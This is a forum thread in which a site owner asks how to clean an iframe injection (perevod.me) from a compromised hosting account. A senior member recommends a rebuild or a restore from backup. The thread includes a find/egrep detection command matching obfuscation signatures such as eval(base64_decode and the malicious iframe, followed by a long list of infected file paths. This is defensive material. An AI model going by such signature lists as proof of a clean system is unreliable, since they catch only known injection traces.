Results 1 to 10 of 10
I have a huge problem! For several years I have paid for a hosting service and after installing a mobile access service to allow cell phone access to my sites, ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
- 02-12-2013 #1Just Joined!
- Join Date
- Feb 2013
- Posts
- 5
hosting server find and replace script?
I have a huge problem! For several years I have paid for a hosting service and after installing a mobile access service to allow cell phone access to my sites, all heck broke loose. I had a pulgin hacked and yes I am 99% certain it was the mobi access as timing is way too coincidental. So now I have a infected hosting server. I was told to write a find and replace script by their tech support. To be honest I have not worked with linux/Unix in years (1980's) and am not confident enough to try this without advice.
I will give below the line so you can see whats found. The tech support guy was kind enough to do a search for the perevod.me iframes hack/infection.
find ./ -type f \( -iname \*.php -o -iname \*html\* -o -iname \*.js \) -print0 |xargs -0 egrep -ils '(eval\(base64\_decode|Array\(base64\_decode|\/*\/preg\_replace\(|function_exists\(.*\_jquery\_theme |iframe src\=\"xxxx\:\/\/perevod)'
had to replace the http with xxxx above because the site here thinks I am posting a link.
Now I have to figure out how to use a script to remove this trash.
Additional question: I found out the site perevod dot me is a fraud site according to the WHOIS Search, Domain Name, Website, and IP Tools - Who. information. The site city is fake, judging by the zip code, the telephone number is a sales infomecial for HGH, and the street address is also fake. I thought ICANN would disallow a registration over the fraud. How can I get this site removed as it is the hackers/infection site and it is also a blacklisted site loaded with really bad malware.
Anyways can anyone give me some advice on how to do a find and replace script?
- 02-12-2013 #2Trusted Penguin
- Join Date
- May 2009
- Location
- Munich
- Posts
- 2,973
Hi and welcome
Sorry, but a search&replace is not enough, because it only removes the symptom, not the cause.
My recommendation is to take this host off the net,
analyze how the hack happened
backup and verify your data, config and logs
and then install a new system.You must always face the curtain with a bow.
- 02-12-2013 #3Just Joined!
- Join Date
- Feb 2013
- Posts
- 5
The problem appears to be the plugin, this was looked at by myself, and two techs at the server hosting company, and the techs reported the exploit to their management to have the plugin company put on notice. So this problem and plugin has been banished, and since there has been zero intrusions. Now I need to get rid of the iframes left over.
Originally Posted by Irithori 
- 02-12-2013 #4Trusted Penguin
- Join Date
- May 2009
- Location
- Munich
- Posts
- 2,973
Best practice is to reinstall. Your call.
The find line in your first post will provide a filelist.
So the next best recommendation is to recover these files from a point in time before this plugin has been installed.You must always face the curtain with a bow.
- 02-12-2013 #5Just Joined!
- Join Date
- Feb 2013
- Posts
- 5
A backup and reinstall will not work. They did a huge upgrade and server maintenance Sunday and all the backups are corrupted now. Plus the backups are not old enough to be prior to the plugin addition months ago. Yes I should have not trusted the server to have good backups going back that far, but whats done is done.
I need to know how to write a find and replace to remove this problem as all the 400.shtml files are also infected, this infection is so pervasive it has even infected themes and you name it. So short of destroying years of work, and site information, I need to try a script to avoid the loss of several years of running 3 sites.
Does anyone have enough knowledge to advise me how to write such a script?
Originally Posted by Irithori
- 02-12-2013 #6Trusted Penguin
- Join Date
- May 2009
- Location
- Munich
- Posts
- 2,973
Search&replace is hard, if neither the current infected nor previous good state is given..
I tried to find technical background information about what "perevod" actually changes, especially if really only webfiles (.html, .js, etc) are affected.
But apart from pointers to some obscure russian sites, I couldnt find anything.
As you and the techs looked at the hack: Can you tell and print in total what has been inserted?
For obvious reasons, please make sure that links to malicious sites are not pasted verbatim here.
Also please use code tags.You must always face the curtain with a bow.
- 02-12-2013 #7Just Joined!
- Join Date
- Feb 2013
- Posts
- 5
here is a find script we used. This may be only a partial list.
..........................................
./builder/loader_err.html
./builder/mobifiles/d2/res/themes/images/bgMetal.html
./builder/mobifiles/d2/res/themes/images/chevron.html
./builder/mobifiles/d2/res/themes/images/chevron_dg.html
./builder/mobifiles/d2/res/themes/.html
./builder/mobifiles/d2/res/themes/apple/img/listArrow.html
./builder/mobifiles/d4/res/themes/images/bgMetal.html
./builder/mobifiles/d4/res/themes/images/chevron.html
./builder/mobifiles/d4/res/themes/images/chevron_dg.html
./builder/mobifiles/d4/res/themes/.html
./builder/mobifiles/d4/res/themes/apple/img/listArrow.html
./builder/mobifiles/d9/res/themes/images/bgMetal.html
./builder/mobifiles/d9/res/themes/images/chevron.html
./builder/mobifiles/d9/res/themes/images/chevron_dg.html
./builder/mobifiles/d9/res/themes/.html
./builder/mobifiles/d9/res/themes/apple/img/listArrow.html
./builder/mobifiles/d3/res/themes/images/bgMetal.html
./builder/mobifiles/d3/res/themes/images/chevron.html
./builder/mobifiles/d3/res/themes/images/chevron_dg.html
./builder/mobifiles/d3/res/themes/.html
./builder/mobifiles/d3/res/themes/apple/img/listArrow.html
./themes/sandium/page.tpl.php
./themes/bluemarine/page.tpl.php
./themes/garland/maintenance-page.tpl.php
./themes/garland/page.tpl.php
./themes/acquia_prosper/page.tpl.php
./themes/newswire/page.tpl.php
./themes/soldier/page.tpl.php
./themes/admire_navy_5.x-1.3/admire_navy/page.tpl.php
./themes/acquia_slate/page.tpl.php
./themes/pushbutton/page.tpl.php
./themes/elements_theme/page.tpl.php
./themes/colourise/maintenance-page.tpl.php
./themes/colourise/page.tpl.php
./themes/bealestreet/themes/bealestreet/page.tpl.php
./themes/addari/page.tpl.php
./themes/newsflash/page.tpl.php
./themes/admire_grunge/page.tpl.php
./themes/burn_360-0.7.4/README.html
./themes/burn_360-0.7.4/README.html~
./themes/genesis_darkmatter/page.tpl.php
./themes/tma/tma/page.tpl.php
./forums/install.bak/database_update.php
./forums/install.bak/index.php
./forums/cache/tpl_AeroBlack_viewtopic_print.html.php
./forums/cache/ctpl_admin_simple_footer.html.php
./forums/cache/tpl_AeroBlack_overall_footer.html.php
./forums/cache/tpl_AeroBlack_simple_footer.html.php
./forums/cache/ctpl_admin_overall_footer.html.php
./forums/styles/PlayStation/template/viewtopic_print.html
./forums/styles/PlayStation/template/simple_footer.html
./forums/styles/PlayStation/template/overall_footer.html
./forums/styles/PlayStation/template/ucp_pm_viewmessage_print.html
./forums/styles/GTA4/template/viewtopic_print.html
./forums/styles/GTA4/template/simple_footer.html
./forums/styles/GTA4/template/overall_footer.html
./forums/styles/GTA4/template/ucp_pm_viewmessage_print.html
./forums/styles/pro_MylCastel/template/viewtopic_print.html
./forums/styles/pro_MylCastel/template/simple_footer.html
./forums/styles/pro_MylCastel/template/overall_footer.html
./forums/styles/pro_MylCastel/template/ucp_pm_viewmessage_print.html
./forums/styles/Pro_iphone/template/viewtopic_print.html
./forums/styles/Pro_iphone/template/simple_footer.html
./forums/styles/Pro_iphone/template/overall_footer.html
./forums/styles/Pro_iphone/template/ucp_pm_viewmessage_print.html
./forums/styles/SpringFlowers/template/viewtopic_print.html
./forums/styles/SpringFlowers/template/simple_footer.html
./forums/styles/SpringFlowers/template/overall_footer.html
./forums/styles/SpringFlowers/template/ucp_pm_viewmessage_print.html
./forums/styles/360Elite/template/viewtopic_print.html
./forums/styles/360Elite/template/simple_footer.html
./forums/styles/360Elite/template/overall_footer.html
./forums/styles/360Elite/template/ucp_pm_viewmessage_print.html
./forums/styles/OATempleofZeus/template/viewtopic_print.html
./forums/styles/OATempleofZeus/template/simple_footer.html
./forums/styles/OATempleofZeus/template/overall_footer.html
./forums/styles/OATempleofZeus/template/ucp_pm_viewmessage_print.html
./forums/styles/hardcamo/template/viewtopic_print.html
./forums/styles/hardcamo/template/simple_footer.html
./forums/styles/hardcamo/template/overall_footer.html
./forums/styles/hardcamo/template/ucp_pm_viewmessage_print.html
./forums/styles/OAstrawberry/template/viewtopic_print.html
./forums/styles/OAstrawberry/template/simple_footer.html
./forums/styles/OAstrawberry/template/overall_footer.html
./forums/styles/OAstrawberry/template/ucp_pm_viewmessage_print.html
./forums/styles/Xbox_360/template/viewtopic_print.html
./forums/styles/Xbox_360/template/simple_footer.html
./forums/styles/Xbox_360/template/overall_footer.html
./forums/styles/Xbox_360/template/ucp_pm_viewmessage_print.html
./forums/styles/template/viewtopic_print.html
./forums/styles/template/simple_footer.html
./forums/styles/template/overall_footer.html
./forums/styles/template/ucp_pm_viewmessage_print.html
./forums/styles/AeroBlack/template/viewtopic_print.html
./forums/styles/AeroBlack/template/simple_footer.html
./forums/styles/AeroBlack/template/overall_footer.html
./forums/styles/AeroBlack/template/ucp_pm_viewmessage_print.html
./forums/installer-disabled/database_update.php
./forums/installer-disabled/index.php
./forums/install.old/database_update.php
./forums/install.old/index.php
./modules/book/book-export-html.tpl.php
./modules/system/maintenance-page.tpl.php
./modules/system/page.tpl.php
./401.shtml
./500.php
./403.shtml
./blogs/wp-includes/js/codepress/codepress.html
./blogs/wp-admin/import/blogware.php
./blogs/wp-admin/import/livejournal.php
./blogs/wp-admin/sidebar.php
./blogs/wp-content/themes/default/comments-popup.php
./blogs/wp-content/themes/default/footer.php
./blogs/wp-content/themes/classic/comments-popup.php
./blogs/wp-content/themes/classic/footer.php
./blogs/wp-content/themes/news-magazine-theme-640/footer.php
./administrator/components/com_joomlaxplorer/images/index.html
./administrator/components/com_joomlaxplorer/scripts/index.html
./administrator/components/com_joomlaxplorer/scripts/codepress/codepress.html
./administrator/components/com_joomlaxplorer/scripts/codepress/index.html
./administrator/components/com_joomlaxplorer/languages/index.html
./administrator/components/com_joomlaxplorer/style/index.html
./administrator/components/com_joomlaxplorer/index.html
./administrator/components/com_joomlaxplorer/ftp_tmp/index.html
./administrator/components/com_joomlaxplorer/include/fun_system_info.php
./administrator/components/com_joomlaxplorer/include/index.html
./administrator/components/com_joomlaxplorer/config/index.html
./administrator/components/com_joomlaxplorer/libraries/MIME/index.html
./administrator/components/com_joomlaxplorer/libraries/Archive/Writer/index.html
./administrator/components/com_joomlaxplorer/libraries/Archive/Predicate/index.html
./administrator/components/com_joomlaxplorer/libraries/Archive/index.html
./administrator/components/com_joomlaxplorer/libraries/Archive/Reader/index.html
./administrator/components/com_joomlaxplorer/libraries/index.html
./administrator/components/com_joomlaxplorer/libraries/FTP/index.html
./templates/images/copyrights/fam_fam_silk/index.html
./templates/images/copyrights/index.html
./templates/images/copyrights/tango/index.html
./templates/images/rtl/index.html
./templates/images/index.html
./templates/images/icons/index.html
./templates/soldier_of_fortune/component.php
./templates/soldier_of_fortune/index.html
./templates/soldier_of_fortune/html/mod_mainmenu/index.html
./templates/soldier_of_fortune/html/index.html
./templates/soldier_of_fortune/html/mod_syndicate/index.html
./templates/soldier_of_fortune/html/com_content/section/index.html
./templates/soldier_of_fortune/html/com_content/article/index.html
./templates/soldier_of_fortune/html/com_content/index.html
./templates/soldier_of_fortune/html/com_content/frontpage/index.html
./templates/soldier_of_fortune/html/com_content/category/index.html
./templates/com_gantry/tmpl/index-iphone.php
./templates/com_gantry/facets/menu/themes/basic/index.html
./templates/com_gantry/facets/menu/themes/touch/index.html
./templates/com_gantry/facets/menu/themes/index.html
./templates/com_gantry/facets/menu/themes/fusion/images/index.html
./templates/com_gantry/facets/menu/themes/fusion/js/index.html
./templates/com_gantry/facets/menu/themes/fusion/css/index.html
./templates/com_gantry/facets/menu/themes/fusion/index.html
./templates/com_gantry/facets/menu/index.html
./templates/com_gantry/admin/phpQuery.php
./templates/com_gantry/admin/ajax-models/diagnostics.php
./templates/com_gantry/admin/index.html
./templates/component.php
./templates/css/index.html
./templates/layouts/default.php
./templates/rt_grunge_j15/images/backgrounds/index.html
./templates/rt_grunge_j15/images/backgrounds/style1/index.html
./templates/rt_grunge_j15/images/body/index.html
./templates/rt_grunge_j15/images/body/style1/index.html
./templates/rt_grunge_j15/images/typography/index.html
./templates/rt_grunge_j15/images/index.html
./templates/rt_grunge_j15/images/icons/index.html
./templates/rt_grunge_j15/images/logo/index.html
./templates/rt_grunge_j15/images/logo/style1/index.html
./templates/rt_grunge_j15/js/index.html
./templates/rt_grunge_j15/debugbody.php
./templates/rt_grunge_j15/component.php
./templates/rt_grunge_j15/custom/menuitemparams/index.html
./templates/rt_grunge_j15/custom/index.html
./templates/rt_grunge_j15/css/index.html
./templates/rt_grunge_j15/params/index.html
./templates/rt_grunge_j15/index.php
./templates/rt_grunge_j15/admin/index.html
./templates/rt_grunge_j15/admin/presets/index.html
./templates/rt_grunge_j15/features/index.html
./templates/rt_grunge_j15/profile.php
./templates/rt_grunge_j15/html/mod_poll/index.html
./templates/rt_grunge_j15/html/mod_login/index.html
./templates/rt_grunge_j15/html/mod_breadcrumbs/index.html
./templates/rt_grunge_j15/html/mod_newsflash/index.html
./templates/rt_grunge_j15/html/com_weblinks/categories/index.html
./templates/rt_grunge_j15/html/com_weblinks/index.html
./templates/rt_grunge_j15/html/com_weblinks/weblink/index.html
./templates/rt_grunge_j15/html/com_weblinks/category/index.html
./templates/rt_grunge_j15/html/com_contact/contact/index.html
./templates/rt_grunge_j15/html/com_contact/category/index.html
./templates/rt_grunge_j15/html/index.html
./templates/rt_grunge_j15/html/com_poll/poll/index.html
./templates/rt_grunge_j15/html/com_poll/index.html
./templates/rt_grunge_j15/html/com_newsfeeds/newsfeed/index.html
./templates/rt_grunge_j15/html/com_newsfeeds/categories/index.html
./templates/rt_grunge_j15/html/com_newsfeeds/index.html
./templates/rt_grunge_j15/html/com_newsfeeds/category/index.html
./templates/rt_grunge_j15/html/com_content/section/section/index.html
./templates/rt_grunge_j15/html/com_content/section/index.html
./templates/rt_grunge_j15/html/com_content/article/index.html
./templates/rt_grunge_j15/html/com_content/index.html
./templates/rt_grunge_j15/html/com_content/frontpage/index.html
./templates/rt_grunge_j15/html/com_content/category/index.html
./templates/rt_grunge_j15/html/com_content/category/category/index.html
./templates/rt_grunge_j15/html/com_rokcandy/index.html
./templates/error.php
./templates/pizza/images/copyrights/fam_fam_silk/index.html
./templates/pizza/images/copyrights/index.html
./templates/pizza/images/copyrights/tango/index.html
./templates/pizza/images/rtl/index.html
./templates/pizza/images/index.html
./templates/pizza/images/icons/index.html
./templates/pizza/component.php
./templates/pizza/css/index.html
./templates/pizza/layouts/default.php
./templates/pizza/index.html
./templates/pizza/html/mod_poll/index.html
./templates/pizza/html/mod_login/index.html
./templates/pizza/html/mod_newsflash/index.html
./templates/pizza/html/com_weblinks/categories/index.html
./templates/pizza/html/com_weblinks/index.html
./templates/pizza/html/com_weblinks/category/index.html
./templates/pizza/html/com_contact/contact/index.html
./templates/pizza/html/com_contact/index.html
./templates/pizza/html/com_contact/category/index.html
./templates/pizza/html/mod_latestnews/index.html
./templates/pizza/html/com_search/search/index.html
./templates/pizza/html/com_search/index.html
./templates/pizza/html/mod_footer/index.html
./templates/pizza/html/com_user/reset/index.html
./templates/pizza/html/com_user/user/index.html
./templates/pizza/html/com_user/login/index.html
./templates/pizza/html/com_user/index.html
./templates/pizza/html/com_user/remind/index.html
./templates/pizza/html/com_user/register/index.html
./templates/pizza/html/mod_search/index.html
./templates/pizza/html/index.html
./templates/pizza/html/com_poll/poll/index.html
./templates/pizza/html/com_poll/index.html
./templates/pizza/html/mod_syndicate/index.html
./templates/pizza/html/com_newsfeeds/newsfeed/index.html
./templates/pizza/html/com_newsfeeds/categories/index.html
./templates/pizza/html/com_newsfeeds/index.html
./templates/pizza/html/com_newsfeeds/category/index.html
./templates/pizza/html/com_content/section/index.html
./templates/pizza/html/com_content/article/index.html
./templates/pizza/html/com_content/index.html
./templates/pizza/html/com_content/frontpage/index.html
./templates/pizza/html/com_content/category/index.html
./templates/themza_j15_17/images/index.html
./templates/themza_j15_17/js/index.html
./templates/themza_j15_17/component.php
./templates/themza_j15_17/css/index.html
./templates/themza_j15_17/index.html
./templates/themza_j15_17/index.php
./templates/themza_j15_17/html/index.html
./templates/html/mod_poll/index.html
./templates/html/mod_login/index.html
./templates/html/mod_newsflash/index.html
./templates/html/com_weblinks/categories/index.html
./templates/html/com_weblinks/index.html
./templates/html/com_weblinks/category/index.html
./templates/html/com_contact/contact/index.html
./templates/html/com_contact/index.html
./templates/html/com_contact/category/index.html
./templates/html/mod_latestnews/index.html
./templates/html/com_search/search/index.html
./templates/html/com_search/index.html
./templates/html/mod_footer/index.html
./templates/html/com_user/reset/index.html
./templates/html/com_user/user/index.html
./templates/html/com_user/login/index.html
./templates/html/com_user/index.html
./templates/html/com_user/remind/index.html
./templates/html/com_user/register/index.html
./templates/html/mod_search/index.html
./templates/html/index.html
./templates/html/com_poll/poll/index.html
./templates/html/com_poll/index.html
./templates/html/mod_banners/index.html
./templates/html/mod_syndicate/index.html
./templates/html/com_newsfeeds/newsfeed/index.html
./templates/html/com_newsfeeds/categories/index.html
./templates/html/com_newsfeeds/index.html
./templates/html/com_newsfeeds/category/index.html
./templates/html/com_content/section/index.html
./templates/html/com_content/article/index.html
./templates/html/com_content/index.html
./templates/html/com_content/frontpage/index.html
./templates/html/com_content/category/index.html
./templates/black_joomla_v1.0/component.php
./templates/black_joomla_v1.0/index.html
./templates/black_joomla_v1.0/index.php
./templates/black_joomla_v1.0/html/mod_mainmenu/index.html
./templates/black_joomla_v1.0/html/index.html
./templates/black_joomla_v1.0/html/mod_syndicate/index.html
./templates/black_joomla_v1.0/html/com_content/section/index.html
./templates/black_joomla_v1.0/html/com_content/article/index.html
./templates/black_joomla_v1.0/html/com_content/index.html
./templates/black_joomla_v1.0/html/com_content/frontpage/index.html
./templates/black_joomla_v1.0/html/com_content/category/index.html
./templates/iyosisj1/component.php
./templates/iyosisj1/index.php
./templates/iyosisj1/html/mod_banners/index.html
./templates/iyosisj1/html/com_content/section/index.html
./templates/iyosisj1/html/com_content/article/index.html
./templates/iyosisj1/html/com_content/index.html
./templates/iyosisj1/html/com_content/frontpage/index.html
./templates/iyosisj1/html/com_content/category/index.html
./index.html
./gallery/themes/stopdesign/albumarchive.php
./gallery/zp-core/refresh-metadata.php
./gallery/zp-core/albumsort.php
./gallery/zp-core/dynamic.php
./gallery/zp-core/cache-images.php
./profiles/wp-login.php
./profiles/modules/admin_help_english/docs/upgrade.html
./profiles/modules/admin_help_english/docs/admin_comments.html
./profiles/modules/admin_help_english/docs/users.html
./profiles/modules/admin_help_english/docs/modules.html
./profiles/modules/admin_help_english/docs/admin_index.html
./profiles/modules/admin_help_english/docs/templates.html
./profiles/modules/admin_help_english/docs/register.html
./profiles/modules/admin_help_english/docs/admin_modules.html
./profiles/modules/admin_help_english/docs/admin_users.html
./profiles/modules/admin_help_english/docs/vote.html
./profiles/modules/admin_help_english/docs/admin_categories.html
./profiles/modules/admin_help_english/docs/pligg_pro.html
./profiles/modules/admin_help_english/docs/core.html
./profiles/modules/admin_help_english/docs/admin_backup.html
./profiles/modules/admin_help_english/docs/admin_links.html
./profiles/modules/admin_help_english/docs/template_edit.html
./profiles/modules/admin_help_english/docs/admin_page.html
./profiles/modules/admin_help_english/docs/walkthrough.html
./profiles/modules/admin_help_english/docs/submit.html
./profiles/modules/admin_help_english/docs/welcome.html
./profiles/languages/readme_thai.html
./profiles/wp-includes/js/codepress/codepress.html
./profiles/wp-includes/js/tinymce/plugins/wpeditimage/editimage.html
./profiles/wp-includes/js/tinymce/wp-mce-help.php
./profiles/wp-includes/theme-compat/comments-popup.php
./profiles/wp-includes/theme-compat/footer.php
./profiles/wp-includes/functions.php
./profiles/wp-includes/functions.wp-scripts.php
./profiles/wp-includes/ms-deprecated.php
./profiles/wp-includes/ms-functions.php
./profiles/wp-includes/load.php
./profiles/wp-includes/wpmu-functions.php
./profiles/3rdparty/speller/spellchecker.html
./profiles/3rdparty/speller/server-scripts/spellchecker.php
./profiles/3rdparty/speller/controls.html
./profiles/wp-admin/import/blogware.php
./profiles/wp-admin/import/livejournal.php
./profiles/wp-admin/sidebar.php
./profiles/wp-admin/ms-edit.php
./profiles/wp-admin/maint/repair.php
./profiles/wp-admin/press-this.php
./profiles/wp-admin/install.php
./profiles/wp-admin/includes/media.php
./profiles/wp-admin/includes/template.php
./profiles/wp-admin/admin-footer.php
./profiles/wp-admin/upgrade.php
./profiles/wp-admin/wpmu-edit.php
./profiles/wp-admin/setup-config.php
./profiles/wp-content/themes/bphome/comments-popup.php
./profiles/wp-content/themes/bphome/footer.php
./profiles/wp-content/themes/home/comments-popup.php
./profiles/wp-content/themes/home/footer.php
./profiles/wp-content/themes/default/comments-popup.php
./profiles/wp-content/themes/default/footer.php
./profiles/wp-content/themes/classic/comments-popup.php
./profiles/wp-content/themes/classic/footer.php
./profiles/wp-content/themes/bp-sn-parent/footer.php
./profiles/wp-content/themes/twentyten/footer.php
./profiles/wp-content/themes/bp-default/footer.php
./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-templates/kakumei/footer.php
./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-admin/admin-footer.php
./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-includes/backpress/functions.core.php
./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-includes/functions.bb-core.php
./profiles/wp-content/plugins/buddypress/bp-themes/bp-default/footer.php
./profiles/wp-content/bp-themes/bpmember/footer.php
./profiles/wp-content/bp-themes/bpskeletonmember/footer.php
./profiles/wp-links-opml.php
./profiles/cache/templates_c/c_1__admin_admin_tpl.php
./profiles/cache/templates_c/c_1_wistie_pligg_tpl.php
./profiles/index-install.php
./profiles/admin/index.php
./profiles/libs/backup/mysql_backup/libs/gonxtabs.class.php
./profiles/libs/pre_install_check.php
./profiles/wp-app.php
./profiles/readme.html
./forumsold/instal.bat/database_update.php
./forumsold/instal.bat/index.php
./forumsold/download/file.php
./forumsold/docs/INSTALL.html
./forumsold/docs/README.html
./forumsold/docs/FAQ.html
./forumsold/docs/coding-guidelines.html
./forumsold/docs/hook_system.html
./forumsold/docs/auth_api.html
./forumsold/docs/CHANGELOG.html
./forumsold/includes/functions_jabber.php
./forumsold/includes/functions.php
./forumsold/includes/db/dbal.php
./forumsold/includes/acp/acp_php_info.php
./forumsold/adm/style/simple_footer.html
./forumsold/adm/style/overall_footer.html
./forumsold/adm/style/colour_swatch.html
./forumsold/adm/style/install_footer.html
./forumsold/cache/tpl_pro-MylCastel_overall_footer.html.php
./forumsold/cache/tpl_buziness-board_simple_footer.html.php
./forumsold/cache/tpl_martial_overall_footer.html.php
./forumsold/cache/ctpl_admin_simple_footer.html.php
./forumsold/cache/tpl_prosilver_overall_footer.html.php
./forumsold/cache/tpl_AeroBlack_overall_footer.html.php
./forumsold/cache/tpl_OATempleofZeus_overall_footer.html.php
./forumsold/cache/tpl_Pro-iphone_overall_footer.html.php
./forumsold/cache/tpl_buziness-board_overall_footer.html.php
./forumsold/cache/ctpl_admin_overall_footer.html.php
./forumsold/styles/pro_MylCastel/template/viewtopic_print.html
./forumsold/styles/pro_MylCastel/template/simple_footer.html
./forumsold/styles/pro_MylCastel/template/overall_footer.html
./forumsold/styles/pro_MylCastel/template/ucp_pm_viewmessage_print.html
./forumsold/styles/subsilver2/template/viewtopic_print.html
./forumsold/styles/subsilver2/template/simple_footer.html
./forumsold/styles/subsilver2/template/overall_footer.html
./forumsold/styles/subsilver2/template/ucp_pm_viewmessage_print.html
./forumsold/styles/Pro_iphone/template/viewtopic_print.html
./forumsold/styles/Pro_iphone/template/simple_footer.html
./forumsold/styles/Pro_iphone/template/overall_footer.html
./forumsold/styles/Pro_iphone/template/ucp_pm_viewmessage_print.html
./forumsold/styles/SpringFlowers/template/viewtopic_print.html
./forumsold/styles/SpringFlowers/template/simple_footer.html
./forumsold/styles/SpringFlowers/template/overall_footer.html
./forumsold/styles/SpringFlowers/template/ucp_pm_viewmessage_print.html
./forumsold/styles/OATempleofZeus/template/viewtopic_print.html
./forumsold/styles/OATempleofZeus/template/simple_footer.html
./forumsold/styles/OATempleofZeus/template/overall_footer.html
./forumsold/styles/OATempleofZeus/template/ucp_pm_viewmessage_print.html
./forumsold/styles/buziness_board/template/viewtopic_print.html
./forumsold/styles/buziness_board/template/simple_footer.html
./forumsold/styles/buziness_board/template/overall_footer.html
./forumsold/styles/buziness_board/template/ucp_pm_viewmessage_print.html
./forumsold/styles/OAstrawberry/template/viewtopic_print.html
./forumsold/styles/OAstrawberry/template/simple_footer.html
./forumsold/styles/OAstrawberry/template/overall_footer.html
./forumsold/styles/OAstrawberry/template/ucp_pm_viewmessage_print.html
./forumsold/styles/ProHalloween/template/viewtopic_print.html
./forumsold/styles/ProHalloween/template/simple_footer.html
./forumsold/styles/ProHalloween/template/overall_footer.html
./forumsold/styles/ProHalloween/template/ucp_pm_viewmessage_print.html
./forumsold/styles/AeroBlack/template/viewtopic_print.html
./forumsold/styles/AeroBlack/template/simple_footer.html
./forumsold/styles/AeroBlack/template/overall_footer.html
./forumsold/styles/AeroBlack/template/ucp_pm_viewmessage_print.html
./forumsold/styles/prosilver/template/viewtopic_print.html
./forumsold/styles/prosilver/template/simple_footer.html
./forumsold/styles/prosilver/template/overall_footer.html
./forumsold/styles/prosilver/template/ucp_pm_viewmessage_print.html
./forumsold/styles/martial/template/viewtopic_print.html
./forumsold/styles/martial/template/simple_footer.html
./forumsold/styles/martial/template/overall_footer.html
./forumsold/styles/martial/template/ucp_pm_viewmessage_print.html
./forumsold/install.old/index.php
./mysite/wp-includes/js/codepress/codepress.html
./mysite/wp-includes/wpmu-functions.php
./mysite/wp-admin/import/blogware.php
./mysite/wp-admin/import/livejournal.php
./mysite/wp-admin/wpmu-edit.php
./mysite/wp-content/themes/bphome/comments-popup.php
./mysite/wp-content/themes/bphome/footer.php
./mysite/wp-content/themes/bp-sn-parent/footer.php
./mysite/wp-content/themes/bp-default/footer.php
./mysite/wp-content/bp-themes/bpmember/footer.php
./mysite/wp-content/bp-themes/bpskeletonmember/footer.php
./mysite/index-install.php
./cache/mod_mainmenu/index.html
./cache/mod_banners/index.html
./400.shtml
./tmp/images/copyrights/fam_fam_silk/index.html
./tmp/images/copyrights/index.html
./tmp/images/copyrights/tango/index.html
./tmp/images/rtl/index.html
./tmp/images/index.html
./tmp/images/icons/index.html
./tmp/com_gantry/tmpl/index-iphone.php
./tmp/com_gantry/facets/menu/themes/basic/index.html
./tmp/com_gantry/facets/menu/themes/touch/index.html
./tmp/com_gantry/facets/menu/themes/index.html
./tmp/com_gantry/facets/menu/themes/fusion/images/index.html
./tmp/com_gantry/facets/menu/themes/fusion/js/index.html
./tmp/com_gantry/facets/menu/themes/fusion/css/index.html
./tmp/com_gantry/facets/menu/themes/fusion/index.html
./tmp/com_gantry/facets/menu/index.html
./tmp/com_gantry/admin/phpQuery.php
./tmp/com_gantry/admin/ajax-models/diagnostics.php
./tmp/com_gantry/admin/index.html
./tmp/component.php
./tmp/css/index.html
./tmp/js_education_grn_blu/js/index.html
./tmp/js_education_grn_blu/css/index.html
./tmp/js_education_grn_blu/index.php
./tmp/layouts/default.php
./tmp/rt_grunge_j15/images/backgrounds/index.html
./tmp/rt_grunge_j15/images/backgrounds/style1/index.html
./tmp/rt_grunge_j15/images/body/index.html
./tmp/rt_grunge_j15/images/body/style1/index.html
./tmp/rt_grunge_j15/images/typography/index.html
./tmp/rt_grunge_j15/images/index.html
./tmp/rt_grunge_j15/images/icons/index.html
./tmp/rt_grunge_j15/images/logo/index.html
./tmp/rt_grunge_j15/images/logo/style1/index.html
./tmp/rt_grunge_j15/js/index.html
./tmp/rt_grunge_j15/debugbody.php
./tmp/rt_grunge_j15/component.php
./tmp/rt_grunge_j15/custom/menuitemparams/index.html
./tmp/rt_grunge_j15/custom/index.html
./tmp/rt_grunge_j15/css/index.html
./tmp/rt_grunge_j15/params/index.html
./tmp/rt_grunge_j15/index.php
./tmp/rt_grunge_j15/admin/index.html
./tmp/rt_grunge_j15/admin/presets/index.html
./tmp/rt_grunge_j15/features/index.html
./tmp/rt_grunge_j15/profile.php
./tmp/rt_grunge_j15/html/mod_poll/index.html
./tmp/rt_grunge_j15/html/mod_login/index.html
./tmp/rt_grunge_j15/html/mod_breadcrumbs/index.html
./tmp/rt_grunge_j15/html/mod_newsflash/index.html
./tmp/rt_grunge_j15/html/com_weblinks/categories/index.html
./tmp/rt_grunge_j15/html/com_weblinks/index.html
./tmp/rt_grunge_j15/html/com_weblinks/weblink/index.html
./tmp/rt_grunge_j15/html/com_weblinks/category/index.html
./tmp/rt_grunge_j15/html/com_contact/contact/index.html
./tmp/rt_grunge_j15/html/com_contact/category/index.html
./tmp/rt_grunge_j15/html/index.html
./tmp/rt_grunge_j15/html/com_poll/poll/index.html
./tmp/rt_grunge_j15/html/com_poll/index.html
./tmp/rt_grunge_j15/html/com_newsfeeds/newsfeed/index.html
./tmp/rt_grunge_j15/html/com_newsfeeds/categories/index.html
./tmp/rt_grunge_j15/html/com_newsfeeds/index.html
./tmp/rt_grunge_j15/html/com_newsfeeds/category/index.html
./tmp/rt_grunge_j15/html/com_content/section/section/index.html
./tmp/rt_grunge_j15/html/com_content/section/index.html
./tmp/rt_grunge_j15/html/com_content/article/index.html
./tmp/rt_grunge_j15/html/com_content/index.html
./tmp/rt_grunge_j15/html/com_content/frontpage/index.html
./tmp/rt_grunge_j15/html/com_content/category/index.html
./tmp/rt_grunge_j15/html/com_content/category/category/index.html
./tmp/rt_grunge_j15/html/com_rokcandy/index.html
./tmp/error.php
./tmp/js_education_blu_wht/js/index.html
./tmp/js_education_blu_wht/css/index.html
./tmp/js_education_blu_wht/index.php
./tmp/js_education_red_gld/js/index.html
./tmp/js_education_red_gld/css/index.html
./tmp/js_education_red_gld/index.php
./tmp/js_education/js/index.html
./tmp/js_education/css/index.html
./tmp/js_education/index.php
./tmp/html/mod_poll/index.html
./tmp/html/mod_login/index.html
./tmp/html/mod_newsflash/index.html
./tmp/html/com_weblinks/categories/index.html
./tmp/html/com_weblinks/index.html
./tmp/html/com_weblinks/category/index.html
./tmp/html/com_contact/contact/index.html
./tmp/html/com_contact/index.html
./tmp/html/com_contact/category/index.html
./tmp/html/mod_latestnews/index.html
./tmp/html/com_search/search/index.html
./tmp/html/com_search/index.html
./tmp/html/mod_footer/index.html
./tmp/html/com_user/reset/index.html
./tmp/html/com_user/user/index.html
./tmp/html/com_user/login/index.html
./tmp/html/com_user/index.html
./tmp/html/com_user/remind/index.html
